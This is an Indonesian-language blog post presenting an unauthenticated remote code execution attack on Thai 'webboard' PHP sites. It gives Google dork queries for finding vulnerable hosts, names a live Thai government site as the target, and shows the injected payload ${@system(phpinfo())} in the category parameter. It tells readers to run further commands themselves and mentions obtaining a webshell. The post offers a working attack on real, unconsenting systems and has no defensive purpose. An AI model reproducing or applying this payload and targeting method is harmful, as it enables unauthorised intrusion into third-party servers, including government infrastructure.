Header Ads Widget

Responsive Advertisement

Ticker

6/recent/ticker-posts

Webboard ?.th unuathenticated Remote Code Execution (RCE)


-

Hai sobat

Saya ikal,

disini saya akan sharing - sharing sesuatu nih.

-


Okeh kali ini kita akan membahas mengenai remote code execution.


Langsung saja kita masuk ketahap pembahasan.

Bahan :

- Google Dork : 

inurl:/webboard/view.php?category=

"txtSQL" site:*.th

- Browser

- WebShell : bisa kalian download dimana saja.


Okeh pertama - tama kita tentukan target dengan mencarinya menggunakan G-Dork (Google Dork). Disini saya sudah mempunyai live target yah. Live target saya yaitu http://www.abtdanchang.go.th/webboard/index.php?category=webboard&listpage=50 

 

 

Tampilan nya error :D. No problem. sekarang mari kita coba panggil phpinfo dengan cara seperti ini http://www.abtdanchang.go.th/webboard/index.php?category=${@system(phpinfo())}webboard&listpage=50



Yup! Keluar hasilnya :D. Kita cukup memasukan input ${@system(phpinfo())} tepat pada value category (Sesudah = ).


Untuk command - command lainnya, use ur brain :D.


Nah segini Saja untuk artikel kali ini, jika ada yang kurang atau salah kata biarkan saja.


Thanks

See U

Posting Komentar

0 Komentar